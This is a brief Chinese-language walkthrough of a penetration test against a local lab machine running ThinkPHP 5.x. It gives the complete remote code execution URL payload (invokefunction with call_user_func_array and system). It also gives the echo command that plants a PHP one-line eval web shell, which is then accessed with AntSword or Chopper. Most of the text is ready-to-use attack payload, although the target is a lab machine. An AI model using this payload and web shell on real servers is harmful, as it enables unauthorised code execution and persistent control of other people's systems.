ThinkPHP 5.X版本网页提权测试

首先靶机地址http://192.168.1.111
登录
发现版本是thinkphp 5.X版本
果断kali进行搜索tinkphp拼接漏洞

CD到5.X目录下 查看文件 46150.txt

选用一条常用命令
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

进行url的index.php后拼接

拼接过后把cmd部分替换成命令 例如ls先查看该网站下的php目录
之后利用echo 指令写入一句话木马
echo ‘<?php @eval($_POST[6666]);?>’ > helloword.php
然后cat你写入的文件
查看源代码 必须要有你写入的echo指令

此时可以用蚁剑or菜刀连接

完成提权 get shell！！！！！！！！！！